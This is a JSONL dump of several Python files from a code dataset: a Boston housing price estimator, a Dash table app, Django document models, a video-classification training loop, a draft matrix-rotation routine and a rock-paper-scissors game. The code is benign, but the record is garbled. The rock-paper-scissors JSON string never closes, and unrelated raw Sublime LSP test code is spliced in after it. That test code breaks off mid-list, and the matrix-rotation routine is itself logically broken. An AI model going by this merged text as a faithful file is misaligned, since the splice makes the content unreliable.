{"seq_id":"520960102","text":"from sklearn.datasets import load_boston\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.metrics import mean_squared_error\n\nimport pandas as pd\nimport numpy as np\n\n# Gather Data\nboston_dataset = load_boston()\ndata= pd.DataFrame(data=boston_dataset.data, columns = boston_dataset.feature_names)\nfeatures = data.drop(['INDUS', 'AGE'], axis = 1)\n\nlog_prices = np.log(boston_dataset.target)\ntarget = pd.DataFrame(log_prices, columns =['PRICE'])\n\nCRIME_IDX = 0\nZN_IDX = 1\nCHAS_IDX = 2\nRM_IDX = 4\nPTRATIO_IDX = 8\n\nZILLOW_MEDIAN_PRICE = 583.3\nSCALE_FACTOR = ZILLOW_MEDIAN_PRICE / np.median(boston_dataset.target) \n\nproperty_stats =features.mean().values.reshape(1,11)\n\nregr = LinearRegression().fit(features, target)\nfitted_vals = regr.predict(features)\n\n# Calculating MSE \nMSE = mean_squared_error(target, fitted_vals)\nRMSE = np.sqrt(MSE)\n\ndef get_log_estimate(nr_rooms,\n students_per_classroom,\n next_to_river=False,\n high_confidence=True):\n #configure property\n property_stats[0][RM_IDX] = nr_rooms\n property_stats[0][PTRATIO_IDX] = students_per_classroom\n \n if next_to_river:\n property_stats[0][CHAS_IDX] = 1\n else:\n property_stats[0][CHAS_IDX] = 0\n \n #make prediction\n #log_estimate = round(regr.predict(property_stats)[0][0],2)\n log_estimate = regr.predict(property_stats)[0][0]\n \n # calc range\n if high_confidence:\n upper_bound = log_estimate + 2*RMSE\n lower_bound = log_estimate - 2*RMSE\n interval = 95\n else:\n upper_bound = log_estimate + RMSE\n lower_bound = log_estimate - RMSE\n interval = 68\n \n return log_estimate, upper_bound, lower_bound, interval\n\n\ndef get_dollar_estimate(rm, ptratio, chas=False, large_range=True):\n \"\"\" \n Estimate price of a property in Boston \n \n Arguments: \n rm = # of rooms\n ptratio = number of students per teacher in school nearest home\n chas = is near or next to charles river (True or False)\n large_range = 'True' for 95% prediction interval, 'False' for 68% prediction interval\n \"\"\"\n \n \n if rm < 1 or rm > 20 or ptratio < 1 or ptratio > 196 :\n print('Unrealistic parameters. Try again.')\n return\n \n log_est, upper, lower, conf = get_log_estimate(rm, \n students_per_classroom = ptratio, next_to_river = chas, \n high_confidence = large_range)\n\n # convert to today's dollars \n dollar_est =np.e**log_est * 1000 * SCALE_FACTOR\n dollar_hi =np.e**upper * 1000 * SCALE_FACTOR\n dollar_low =np.e**lower * 1000 * SCALE_FACTOR\n\n # round to the nearest thousand dollars\n rounded_est = round(dollar_est,-3)\n rounded_hi = round(dollar_hi,-3)\n rounded_low = round(dollar_low,-3)\n\n print(f'The estimated property value is ${rounded_est}.')\n print(f'At {conf}% confidence the valuation range is')\n print(f'USD {rounded_low} at the lower end, and USD {rounded_hi} at the high end.')","sub_path":"boston_valuation.py","file_name":"boston_valuation.py","file_ext":"py","file_size_in_byte":2981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"525660613","text":"import pandas\nimport dash\nimport dash_table\n\nrr = pandas.read_hdf('./run_report_cache.hd5')\n\n# There is a dash_table bug that prevents filtering with whitespace\nrr = rr.rename(mapper=lambda x: x.replace(' ', '_'), axis='columns')\n\nprint(rr.columns)\n\napp = dash.Dash()\n\napp.layout = dash_table.DataTable(\n id='table',\n columns=[{\"name\": i, \"id\": i} for i in rr.columns],\n data=rr.to_dict('rows'),\n sorting=True,\n # sorting_type='multi',\n filtering=True,\n row_selectable='multi',\n selected_rows=[],\n style_cell_conditional=[\n {\n 'if': {'row_index': 'odd'},\n 'backgroundColor': 'rgb(248, 248, 248)',\n },\n ],\n css=[{\n 'selector': '.dash-cell div.dash-cell-value',\n 'rule': 'display: inline; white-space: inherit; overflow: inherit; text-overflow: inherit;'\n }],\n style_cell={\n 'whiteSpace': 'no-wrap',\n 'overflow': 'hidden',\n 'textOverflow': 'ellipsis',\n 'minWidth': 50,\n },\n)\n\nif __name__ == '__main__':\n app.run_server(debug=True)\n","sub_path":"runreport/aq.py","file_name":"aq.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"567743913","text":"from abc import abstractmethod\n\nfrom collections_extended import RangeMap\nfrom django.db import models\n\nfrom reqs.models import Policy\n\n\nclass DocNode(models.Model):\n policy = models.ForeignKey(Policy, on_delete=models.CASCADE)\n # e.g. part_447__subpart_A__sect_1__par_b\n identifier = models.CharField(max_length=1024)\n # e.g. par\n node_type = models.CharField(max_length=64)\n # e.g. b\n type_emblem = models.CharField(max_length=16)\n text = models.TextField(blank=True)\n\n left = models.PositiveIntegerField()\n right = models.PositiveIntegerField()\n depth = models.PositiveIntegerField()\n\n class Meta:\n unique_together = ('policy', 'identifier')\n index_together = (\n unique_together,\n )\n\n def descendants(self):\n return self.__class__.objects.filter(\n left__gt=self.left, right__lt=self.right, policy_id=self.policy_id\n ).order_by('left')\n\n def flattened_annotations(self) -> RangeMap:\n \"\"\"Fetch all of our annotations and flatten overlaps arbitrarily (for\n now).\"\"\"\n annotations = RangeMap()\n for fcite in self.footnotecitations.all():\n annotations[fcite.start:fcite.end] = fcite # flattens overlaps\n return annotations\n\n def content(self):\n \"\"\"Query all of our annotation types to markup the content of this\n DocNode. Ensure all text is wrapped in an annotation by wrapping it in\n the PlainText annotation. 
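 Illustrative sketch (not from the original docstring), assuming a
 5-character text and a single FootnoteCitation annotation over [0, 2):

 annotations = RangeMap()
 annotations[0:2] = citation      # as built by flattened_annotations()
 wrap_all_text(annotations, 5)    # fills the gap with PlainText(2, 5)
 list(annotations.values())       # -> [citation, PlainText(2, 5)]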
We'll flatten our overlaps arbitrarily for\n now.\"\"\"\n if not self.text:\n return []\n\n annotations = self.flattened_annotations()\n wrap_all_text(annotations, len(self.text))\n\n return list(annotations.values())\n\n\ndef wrap_all_text(annotations: RangeMap, text_length: int):\n \"\"\"Ensure that all text is in an annotation by wrapping it in\n PlainText.\"\"\"\n ranges = list(annotations.ranges()) # make a copy\n previous_end = 0\n for next_start, next_end, _ in ranges:\n if next_start != previous_end:\n annotations[previous_end:next_start] = PlainText(\n start=previous_end, end=next_start)\n previous_end = next_end\n\n # Account for trailing text\n if previous_end != text_length:\n annotations[previous_end:text_length] = PlainText(\n start=previous_end, end=text_length)\n\n\nclass Annotation(models.Model):\n doc_node = models.ForeignKey(\n DocNode, on_delete=models.CASCADE, related_name='%(class)ss')\n start = models.PositiveIntegerField() # inclusive; within doc_node.text\n end = models.PositiveIntegerField() # exclusive; within doc_node.text\n\n class Meta:\n abstract = True\n\n @property\n @abstractmethod\n def content_type(self):\n raise NotImplementedError()\n\n def serialize_content(self, doc_node=None):\n doc_node = doc_node or self.doc_node\n return {\n 'content_type': self.content_type,\n 'text': doc_node.text[self.start:self.end],\n }\n\n\nclass PlainText(Annotation):\n content_type = '__text__'\n\n class Meta:\n abstract = True\n\n\nclass FootnoteCitation(Annotation):\n content_type = 'footnote_citation'\n footnote_node = models.ForeignKey(\n DocNode, on_delete=models.CASCADE, related_name='+')\n\n def serialize_content(self, doc_node=None):\n result = super().serialize_content(doc_node)\n result['footnote_node'] = self.footnote_node.identifier\n return result\n","sub_path":"api/document/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"206417062","text":"import os\nimport copy\nimport torch\nimport shutil\nimport time\nimport warnings\nimport numpy as np\nimport random\nfrom ops import Augment\nimport torch.nn.functional as F\nfrom torch.nn.utils import clip_grad_norm_\nfrom tensorboardX import SummaryWriter\nfrom opts import parser\nfrom ops.mapmeter import mAPMeter, LTMeter\nfrom ops.utils import AverageMeter, accuracy\n\nfrom ops import losses\nfrom tools import utils\n\nfrom dataset import dutils\nfrom models import models\nfrom ops.feature_loader import BasicDataset, ResamplingDataset_Mask\n\ndef setup_seed(seed):\n np.random.seed(seed)\n random.seed(seed)\n torch.manual_seed(seed)\n torch.cuda.manual_seed(seed)\n\ndef adjust_learning_rate(optimizer, epoch, lr_type, lr_steps):\n if lr_type == 'step':\n decay = 0.1 ** (sum(epoch >= np.array(lr_steps)))\n lr = args.lr * decay\n\n elif lr_type == 'cos':\n import math\n lr = 0.5 * args.lr * (1 + math.cos(math.pi * epoch / args.epochs))\n\n else:\n raise NotImplementedError\n\n for param_group in optimizer.param_groups:\n param_group['lr'] = lr\n\ndef check_rootfolders():\n \"\"\"Create log and model folder\"\"\"\n folders_util = [args.root_log, args.root_model,\n os.path.join(args.root_log, args.store_name),\n os.path.join(args.root_model, args.store_name)]\n for folder in folders_util:\n if not os.path.exists(folder):\n print('creating folder ' + folder)\n os.mkdir(folder)\n\ndef save_checkpoint(state, is_best):\n filename = '%s/%s/ckpt.pth.tar' % (args.root_model, args.store_name)\n 
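# (Annotation, not in the original script: the 'cos' branch of
# adjust_learning_rate above is half-cosine annealing,
# lr(t) = 0.5 * lr0 * (1 + cos(pi * t / T)). A standalone check:
#
#     import math
#
#     def cosine_lr(lr0, epoch, total_epochs):
#         return 0.5 * lr0 * (1 + math.cos(math.pi * epoch / total_epochs))
#
#     assert abs(cosine_lr(0.1, 0, 100) - 0.1) < 1e-12  # starts at the base lr
#     assert cosine_lr(0.1, 100, 100) < 1e-12           # decays to ~0 at the end
# )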
torch.save(state, filename)\n if is_best:\n shutil.copyfile(filename, filename.replace('pth.tar', 'best.pth.tar'))\n\ndef load_data(num_class, input_dir):\n train_list = open(args.train_list, 'r').readlines()\n val_list = open(args.val_list, 'r').readlines()\n if args.resample == 'None':\n train_dataset = BasicDataset(train_list, input_dir, args.train_num_frames,\\\n cls_num=num_class, train_mode=True)\n else:\n train_dataset = ResamplingDataset_Mask(train_list, input_dir, args.train_num_frames, \\\n rstype=args.resample, cls_num=args.num_class, train_mode=True)\n val_dataset = BasicDataset(val_list, input_dir, args.val_num_frames, \\\n cls_num=num_class, train_mode=False)\n\n train_dataloader = torch.utils.data.DataLoader(train_dataset, batch_size=args.batch_size, \\\n shuffle=True, num_workers=args.workers, pin_memory=True)\n val_dataloader = torch.utils.data.DataLoader(val_dataset, batch_size=args.batch_size, \\\n shuffle=False, num_workers=args.workers, pin_memory=True)\n return train_dataloader, val_dataloader\n\ndef main():\n \n global args, best_mAP, criterion, optimizer, tf_writer, log_training\n\n \n best_mAP = 0\n\n args = parser.parse_args()\n start_epoch = args.start_epoch \n num_class = args.num_class\n if args.resample != 'None':\n args.reduce = \"none\"\n print (\"########################################################################\\n\")\n print (\"Feature name: {} \\nNumber of class: {} \\nTrain frames: {} \\nVal frames: {}\\nReduction: {}\".\\\n format(args.feature_name, args.num_class, args.train_num_frames, args.val_num_frames, args.reduce))\n print (\"Applied long-tailed strategies: \\n\")\n print (\"\\tAugmentation: {} \\t Re-weighting: {} \\t Re-sampling: {} \\n\". \\\n format(args.augment, args.loss_func, args.resample))\n print (\"######################################################################## \\n\") \n check_rootfolders()\n setup_seed(args.seed)\n\n input_dir = dutils.get_feature_path(args.feature_name)\n feature_dim = dutils.get_feature_dim(args.feature_name)\n args.lc_list, args.train_list, args.val_list = dutils.get_label_path()\n\n train_loader, val_loader = load_data(num_class, input_dir)\n\n criterion = utils.find_class_by_name(args.loss_func, [losses])(args, logits=True, reduce=args.reduce)\n \n indices = utils.get_indices(args.lc_list, head=args.head, tail=args.tail)\n \n model = utils.find_class_by_name(args.model_name, [models])(feature_dim, num_class) \n model = model.cuda()\n \n if args.resume != \"\": \n print (\"=> Loading checkpoint {}\".format(args.resume))\n \n ckpt = torch.load(args.resume)\n best_mAP = ckpt['best_mAP']\n start_epoch = ckpt['epoch'] + 1\n acc1 = ckpt['Acc@1']\n acc5 = ckpt['Acc@5']\n sd = ckpt['state_dict']\n \n print (\"Loaded checkpoint {} epoch {}: best_mAP {} | Acc@1 {} | Acc@5 {}\". 
\\\n format(args.resume, start_epoch, best_mAP, acc1, acc5))\n \n model.load_state_dict(sd)\n\n print (\"Params to learn:\")\n params_to_update = []\n for name, param in model.named_parameters():\n if param.requires_grad == True:\n params_to_update.append(param)\n print ('\\t', name)\n\n optimizer = torch.optim.Adam(params_to_update, lr=args.lr)\n \n log_training = open(os.path.join(args.root_log, args.store_name, 'log.csv'),'w')\n tf_writer = SummaryWriter(log_dir=os.path.join(args.root_log, args.store_name))\n\n for epoch in range(start_epoch, args.epochs):\n adjust_learning_rate(optimizer, epoch, args.lr_type, args.lr_steps)\n print (\"Training for Epoch {}\".format(epoch))\n if args.resample != \"None\":\n rs_train(train_loader, model, epoch, log_training)\n else:\n train(train_loader, model, epoch, log_training)\n if (epoch + 1) % args.eval_freq == 0 or epoch == args.epochs - 1:\n acc1, acc5, mAP = validate(val_loader, model, epoch, log_training, indices)\n is_best = mAP > best_mAP\n best_mAP = max(mAP, best_mAP)\n tf_writer.add_scalar('best_mAP/test_best', best_mAP, epoch)\n \n print ('Test Epoch {}: Acc@1: {} | Acc@5: {} | mAP: {} | best_mAP: {}'.\\\n format(epoch, acc1, acc5, mAP, best_mAP))\n\n save_checkpoint({\n 'epoch': epoch + 1,\n 'feature': args.feature_name,\n 'state_dict': model.state_dict(),\n 'optimizer': optimizer.state_dict(),\n 'best_mAP': best_mAP,\n 'Acc@1': acc1,\n 'Acc@5': acc5},\n is_best)\n\ndef train(loader, model, epoch, log):\n batch_time = AverageMeter()\n data_time = AverageMeter()\n losses = AverageMeter()\n top1 = AverageMeter()\n top5 = AverageMeter()\n mAP = mAPMeter()\n\n model.train() \n end = time.time()\n \n if args.loss_func == 'LDAM':\n # apply DRW to LDAM\n criterion.reset_epoch(epoch)\n for i, (vid, feature, target) in enumerate(loader):\n feature = feature.cuda()\n target = target.float().cuda(non_blocking=True)\n \n if args.augment == \"mixup\":\n gamma = np.random.beta(1.0, 1.0)\n mixed_input, mixed_target = Augment.mixup(feature, target, gamma)\n prediction, output = model(mixed_input)\n loss = criterion(output, mixed_target)\n elif args.augment == \"None\":\n prediction, output = model(feature)\n loss = criterion(output, target)\n else:\n print (\"{} not implemented. 
Please choose ['mixup', 'FrameStack', 'None'].\".\\\n format(args.augment))\n raise NotImplementedError\n \n losses.update(loss.item(), output.size(0))\n\n with torch.no_grad():\n prec1, prec5 = accuracy(output.data, target, topk=(1, 5))\n top1.update(prec1, output.size(0))\n top5.update(prec5, output.size(0))\n \n # accumulate gradient for each parameter\n loss.backward()\n\n if args.clip_gradient is not None:\n total_norm = clip_grad_norm_(model.parameters(), args.clip_gradient)\n \n # update parameters based on current gradients\n optimizer.step()\n optimizer.zero_grad()\n\n # measure elapsed time\n batch_time.update(time.time() - end)\n end = time.time()\n\n if i % args.print_freq == 0:\n output = ('Epoch: [{0}][{1}/{2}], lr: {lr:.5f}\\t'\n 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t'\n 'Loss {loss.val:.4f} ({loss.avg:.4f})\\t'\n 'Prec@1 {top1.val:.3f} ({top1.avg:.3f})\\t'\n 'Prec@5 {top5.val:.3f} ({top5.avg:.3f})\\n'\n .format(\n epoch, i, len(loader), batch_time=batch_time,\n data_time=data_time, loss=losses, top1=top1, top5=top5, \\\n lr=optimizer.param_groups[-1]['lr'])) \n print(output)\n \n log.write(output)\n log.flush()\n \n tf_writer.add_scalar('loss/train_epoch', losses.avg, epoch)\n tf_writer.add_scalar('acc/train_top1', top1.avg, epoch)\n tf_writer.add_scalar('acc/train_top5', top5.avg, epoch)\n tf_writer.add_scalar('lr', optimizer.param_groups[-1]['lr'], epoch)\n\ndef validate(loader, model, epoch, log, indices):\n batch_time = AverageMeter()\n losses = AverageMeter()\n top1 = AverageMeter()\n top5 = AverageMeter()\n mAP = mAPMeter()\n \n LTmAP =LTMeter(indices)\n model.eval()\n\n end = time.time()\n with torch.no_grad():\n for i, (vid, feature, target) in enumerate(loader):\n feature = feature.cuda()\n target = target.float().cuda()\n \n prediction, output = model(feature)\n \n loss = criterion(output, target)\n\n prec1, prec5 = accuracy(output.data, target, topk=(1, 5))\n\n losses.update(loss.item(), feature.size(0))\n top1.update(prec1, feature.size(0))\n top5.update(prec5, feature.size(0))\n\n mAP.add(prediction, target)\n LTmAP.add(prediction, target)\n \n \n batch_time.update(time.time() - end)\n end = time.time()\n\n head_map = LTmAP.value()[\"head\"]\n medium_map = LTmAP.value()[\"medium\"]\n tail_map = LTmAP.value()[\"tail\"]\n \n output = ('Testing Results: Prec@1 {top1.avg:.5f} | Prec@5 {top5.avg:.5f} | Loss {loss.avg:.5f} '\n .format(top1=top1, top5=top5, loss=losses))\n\n print(output)\n lt_output = (\"Overall mAP = {:.3f} | Head = {:.5f} | Medium = {:.5f} | Tail = {:.5f}\".\\\n format(mAP.avg(), head_map, medium_map, tail_map))\n print (lt_output)\n \n if log is not None:\n log.write(output + ' mAP {}\\n'.format(mAP.avg()))\n log.write(lt_output+'\\n')\n log.flush()\n\n if tf_writer is not None:\n tf_writer.add_scalar('loss/test', losses.avg, epoch)\n tf_writer.add_scalar('acc/test_top1', top1.avg, epoch)\n tf_writer.add_scalar('acc/test_top5', top5.avg, epoch)\n tf_writer.add_scalar('mAP/test', mAP.avg(), epoch)\n return top1.avg, top5.avg, mAP.avg() \n\ndef rs_train(loader, model, epoch, log):\n batch_time = AverageMeter()\n data_time = AverageMeter()\n losses = AverageMeter()\n top1 = AverageMeter()\n top5 = AverageMeter()\n mAP = mAPMeter()\n\n model.train() \n end = time.time()\n \n if args.loss_func == 'LDAM':\n # apply DRW to LDAM\n criterion.reset_epoch(epoch)\n for i, (vid, feature, target, mask) in enumerate(loader):\n feature = feature.cuda()\n target = target.float().cuda(non_blocking=True)\n mask = mask.float().cuda()\n\n if args.augment 
== \"mixup\":\n gamma = np.random.beta(1.0, 1.0)\n mixed_input, mixed_target = Augment.mixup(feature, target, gamma)\n prediction, output = model(mixed_input)\n loss = criterion(output, mixed_target)\n elif args.augment == \"None\":\n prediction, output = model(feature)\n loss = criterion(output, target)\n else:\n print (\"{} not implemented. Please choose ['mixup', 'FrameStack', 'None'].\".\\\n format(args.augment))\n raise NotImplementedError\n\n loss = loss * mask\n loss = torch.mean(torch.sum(loss, 1))\n losses.update(loss.item(), output.size(0))\n\n with torch.no_grad():\n prec1, prec5 = accuracy(output.data, target, topk=(1, 5))\n top1.update(prec1, output.size(0))\n top5.update(prec5, output.size(0))\n \n # accumulate gradient for each parameter\n loss.backward()\n\n if args.clip_gradient is not None:\n total_norm = clip_grad_norm_(model.parameters(), args.clip_gradient)\n \n # update parameters based on current gradients\n optimizer.step()\n optimizer.zero_grad()\n\n # measure elapsed time\n batch_time.update(time.time() - end)\n end = time.time()\n\n if i % args.print_freq == 0:\n output = ('Epoch: [{0}][{1}/{2}], lr: {lr:.5f}\\t'\n 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t'\n 'Loss {loss.val:.4f} ({loss.avg:.4f})\\t'\n 'Prec@1 {top1.val:.3f} ({top1.avg:.3f})\\t'\n 'Prec@5 {top5.val:.3f} ({top5.avg:.3f})\\n'\n .format(\n epoch, i, len(loader), batch_time=batch_time,\n data_time=data_time, loss=losses, top1=top1, top5=top5, \\\n lr=optimizer.param_groups[-1]['lr'])) \n print(output)\n \n log.write(output)\n log.flush()\n \n tf_writer.add_scalar('loss/train_epoch', losses.avg, epoch)\n tf_writer.add_scalar('acc/train_top1', top1.avg, epoch)\n tf_writer.add_scalar('acc/train_top5', top5.avg, epoch)\n tf_writer.add_scalar('lr', optimizer.param_groups[-1]['lr'], epoch)\n\n\nif __name__=='__main__':\n main()\n","sub_path":"base_main.py","file_name":"base_main.py","file_ext":"py","file_size_in_byte":13814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"606553570","text":"matrix = [[1, 2, 3, 7],\n [4, 5, 6, 8],\n [4, 5, 6, 9],\n [7, 8, 9, 9]]\n\n\ndef cnext(r, c, degree):\n if r == c:\n if r == 0 and (c + 1) < degree:\n return (r, c + 1)\n if r == degree - 1:\n return (r, c - 1)\n\n if (r < c):\n if c + 1 < degree:\n return (r, c + 1)\n else:\n return (r + 1, c)\n\n if (r > c):\n if c == 0:\n return (r - 1, c)\n else:\n return (r, c - 1)\n\n\ndef rotateMatrix(matrix, length):\n if length == 0 or (len(matrix[0]) != length):\n return None\n\n degree = length\n layers = length / 2\n\n for i in range(layers + 1):\n if degree == 0 or degree == 1:\n break\n\n print(\"starting at degree = \", degree)\n print(i, i)\n next = cnext(i, i, degree)\n while True:\n print(next)\n next = cnext(next[0], next[1], degree)\n if next == (i, i):\n break\n\n degree = degree / 2\n\n\nrotateMatrix(matrix, 4)\n","sub_path":"matrix_rotate.py","file_name":"matrix_rotate.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"593604931","text":"import random\r\nplayer = input(\"Please enter rock, paper, or scissors: \")\r\ncomputer = random.randint(0,2)\r\nprint(\"Computer selected: \",end=\"\")\r\nif computer == 0:\r\n computer = \"rock\"\r\n print(computer)\r\nelif computer == 1:\r\n computer = \"paper\"\r\n print(computer)\r\nelse:\r\n computer = \"scissors\"\r\n print(computer)\r\nif player == computer:\r\n print(\"Both players choose\",player,\". 
No winner\")\r\nelif player == \"scissors\" and computer == \"paper\":\r\n print(player,\" beats \",computer,\". You win!\",sep=\"\")\r\nelif player == \"paper\" and computer == \"scissors\":\r\n print(computer,\" beats \",player,\". You lose!\",sep=\"\")\r\n# Use ASCII string comparison: rock beats scissors and paper beats rock\r\nelse:\r\n if player < computer:\r\n print(player,\" beats \",computer,\". You win!\",sep=\"\")\r\n else:\r\n print(computer,\" beats \",player,\". You lose!\",sep=\"\")\n\n def setUp(self) -> None:\n super().setUp()\n self.view = sublime.active_window().new_file() # new_file() always returns a ready view\n self.view.set_scratch(True)\n self.mock_file_name = \"C:/Windows\" if sublime.platform() == \"windows\" else \"/etc\"\n self.view.file_name = MagicMock(return_value=self.mock_file_name)\n self.view.run_command(\"insert\", {\"characters\": \"hello world\\nfoo bar baz\"})\n\n def tearDown(self) -> None:\n self.view.close()\n return super().tearDown()\n\n def test_missing_uri(self) -> None:\n self.view.settings().erase(\"lsp_uri\")\n with self.assertRaises(MissingUriError):\n uri_from_view(self.view)\n\n def test_nonmissing_uri(self) -> None:\n\n class MockSettings:\n\n def get(value: str, default: Any) -> Any:\n return \"file:///hello/there.txt\"\n\n mock_settings = MockSettings()\n self.view.settings = MagicMock(return_value=mock_settings)\n uri = uri_from_view(self.view)\n self.assertEqual(uri, \"file:///hello/there.txt\")\n\n def test_did_open(self) -> None:\n self.view.settings().set(\"lsp_uri\", filename_to_uri(self.mock_file_name))\n self.assertEqual(did_open(self.view, \"python\").params, {\n \"textDocument\": {\n \"uri\": filename_to_uri(self.mock_file_name),\n \"languageId\": \"python\",\n \"text\": \"hello world\\nfoo bar baz\",\n \"version\": self.view.change_count()\n }\n })\n\n def test_did_change_full(self) -> None:\n version = self.view.change_count()\n self.view.settings().set(\"lsp_uri\", filename_to_uri(self.mock_file_name))\n self.assertEqual(did_change(self.view, version).params, {\n \"textDocument\": {\n \"uri\": filename_to_uri(self.mock_file_name),\n \"version\": version\n },\n \"contentChanges\": [{\"text\": \"hello world\\nfoo bar baz\"}]\n })\n\n def test_will_save(self) -> None:\n self.view.settings().set(\"lsp_uri\", filename_to_uri(self.mock_file_name))\n self.assertEqual(will_save(filename_to_uri(self.mock_file_name), 42).params, {\n \"textDocument\": {\"uri\": filename_to_uri(self.mock_file_name)},\n \"reason\": 42\n })\n\n def test_will_save_wait_until(self) -> None:\n self.view.settings().set(\"lsp_uri\", filename_to_uri(self.mock_file_name))\n self.assertEqual(will_save_wait_until(self.view, 1337).params, {\n \"textDocument\": {\"uri\": filename_to_uri(self.mock_file_name)},\n \"reason\": 1337\n })\n\n def test_did_save(self) -> None:\n self.view.settings().set(\"lsp_uri\", filename_to_uri(self.mock_file_name))\n self.assertEqual(did_save(self.view, include_text=False).params, {\n \"textDocument\": {\"uri\": filename_to_uri(self.mock_file_name)}\n })\n self.assertEqual(did_save(self.view, include_text=True).params, {\n \"textDocument\": {\"uri\": filename_to_uri(self.mock_file_name)},\n \"text\": \"hello world\\nfoo bar baz\"\n })\n\n def test_text_document_position_params(self) -> None:\n self.view.settings().set(\"lsp_uri\", filename_to_uri(self.mock_file_name))\n self.assertEqual(text_document_position_params(self.view, 2), {\n \"textDocument\": {\"uri\": filename_to_uri(self.mock_file_name)},\n \"position\": {\"line\": 0, \"character\": 2}\n })\n\n def test_text_document_formatting(self) -> None:\n self.view.settings = MagicMock(return_value={\n \"translate_tabs_to_spaces\": False,\n \"tab_size\": 1234,\n 
\"ensure_newline_at_eof_on_save\": True,\n \"lsp_uri\": filename_to_uri(self.mock_file_name)\n })\n self.assertEqual(text_document_formatting(self.view).params, {\n \"textDocument\": {\"uri\": filename_to_uri(self.mock_file_name)},\n \"options\": {\n \"tabSize\": 1234,\n \"insertSpaces\": False,\n \"trimTrailingWhitespace\": False,\n \"insertFinalNewline\": True,\n \"trimFinalNewlines\": True\n }\n })\n\n def test_text_document_range_formatting(self) -> None:\n self.view.settings = MagicMock(return_value={\n \"tab_size\": 4321,\n \"lsp_uri\": filename_to_uri(self.mock_file_name)\n })\n self.assertEqual(text_document_range_formatting(self.view, sublime.Region(0, 2)).params, {\n \"textDocument\": {\"uri\": filename_to_uri(self.mock_file_name)},\n \"options\": {\n \"tabSize\": 4321,\n \"insertSpaces\": False,\n \"trimTrailingWhitespace\": False,\n \"insertFinalNewline\": False,\n \"trimFinalNewlines\": False\n },\n \"range\": {\"start\": {\"line\": 0, \"character\": 0}, \"end\": {\"line\": 0, \"character\": 2}}\n })\n\n def test_point_to_offset(self) -> None:\n first_line_length = len(self.view.line(0))\n self.assertEqual(point_to_offset(Point(1, 2), self.view), first_line_length + 3)\n self.assertEqual(point_to_offset(Point(0, first_line_length + 9999), self.view), first_line_length)\n\n def test_point_to_offset_utf16(self) -> None:\n self.view.run_command(\"insert\", {\"characters\": \"🍺foo\"})\n foobarbaz_length = len(\"foo bar baz\")\n offset = point_to_offset(Point(1, foobarbaz_length), self.view)\n # Sanity check\n self.assertEqual(self.view.substr(offset), \"🍺\")\n # When we move two UTF-16 points further, we should encompass the beer emoji.\n # So that means that the code point offsets should have a difference of 1.\n self.assertEqual(point_to_offset(Point(1, foobarbaz_length + 2), self.view) - offset, 1)\n\n def test_selection_range_params(self) -> None:\n self.view.run_command(\"lsp_selection_set\", {\"regions\": [(0, 5), (6, 11)]})\n self.view.settings().set(\"lsp_uri\", filename_to_uri(self.mock_file_name))\n self.assertEqual(len(self.view.sel()), 2)\n self.assertEqual(self.view.substr(self.view.sel()[0]), \"hello\")\n self.assertEqual(self.view.substr(self.view.sel()[1]), \"world\")\n self.assertEqual(selection_range_params(self.view), {\n \"textDocument\": {\"uri\": filename_to_uri(self.mock_file_name)},\n \"positions\": [\n {\"line\": 0, \"character\": 5},\n {\"line\": 0, \"character\": 11}\n ]\n })\n\n def test_minihtml_no_allowed_formats(self) -> None:\n content = \"
<div>text\\n</div>
\"\n with self.assertRaises(Exception):\n minihtml(self.view, content, allowed_formats=0)\n\n def test_minihtml_conflicting_formats(self) -> None:\n content = \"
<div>text\\n</div>
\"\n with self.assertRaises(Exception):\n minihtml(self.view, content, allowed_formats=FORMAT_STRING | FORMAT_MARKED_STRING)\n\n def test_minihtml_format_string(self) -> None:\n content = \"
<div>text\\n</div>
\"\n expect = \"

<div>text
</div>

\"\n self.assertEqual(minihtml(self.view, content, allowed_formats=FORMAT_STRING), expect)\n\n def test_minihtml_format_marked_string(self) -> None:\n content = \"
<div>text\\n</div>
\"\n expect = \"
<div>text\\n</div>
\"\n self.assertEqual(minihtml(self.view, content, allowed_formats=FORMAT_MARKED_STRING), expect)\n\n def test_minihtml_format_markup_content(self) -> None:\n content = {'value': 'This is **bold** text', 'kind': 'markdown'}\n expect = \"

This is bold text

\"\n self.assertEqual(minihtml(self.view, content, allowed_formats=FORMAT_MARKUP_CONTENT), expect)\n\n def test_minihtml_handles_markup_content_plaintext(self) -> None:\n content = {'value': 'type TVec2i = specialize TGVec2', 'kind': 'plaintext'}\n expect = \"

type TVec2i = specialize TGVec2<Integer>

\"\n allowed_formats = FORMAT_MARKED_STRING | FORMAT_MARKUP_CONTENT\n self.assertEqual(minihtml(self.view, content, allowed_formats=allowed_formats), expect)\n\n def test_minihtml_handles_marked_string(self) -> None:\n content = {'value': 'import json', 'language': 'python'}\n expect = '
<div class=\"highlight\"><pre>import json</pre></div>
'\n allowed_formats = FORMAT_MARKED_STRING | FORMAT_MARKUP_CONTENT\n formatted = self._strip_style_attributes(minihtml(self.view, content, allowed_formats=allowed_formats))\n self.assertEqual(formatted, expect)\n\n def test_minihtml_handles_marked_string_mutiple_spaces(self) -> None:\n content = {'value': 'import  json', 'language': 'python'}\n expect = '
<div class=\"highlight\"><pre>import&nbsp;&nbsp;json</pre></div>
'\n allowed_formats = FORMAT_MARKED_STRING | FORMAT_MARKUP_CONTENT\n formatted = self._strip_style_attributes(minihtml(self.view, content, allowed_formats=allowed_formats))\n self.assertEqual(formatted, expect)\n\n def test_minihtml_handles_marked_string_array(self) -> None:\n content = [\n {'value': 'import sys', 'language': 'python'},\n {'value': 'let x', 'language': 'js'}\n ]\n expect = '\\n\\n'.join([\n '
<div class=\"highlight\"><pre>import sys</pre></div>
',\n '
<div class=\"highlight\"><pre>let x</pre></div>
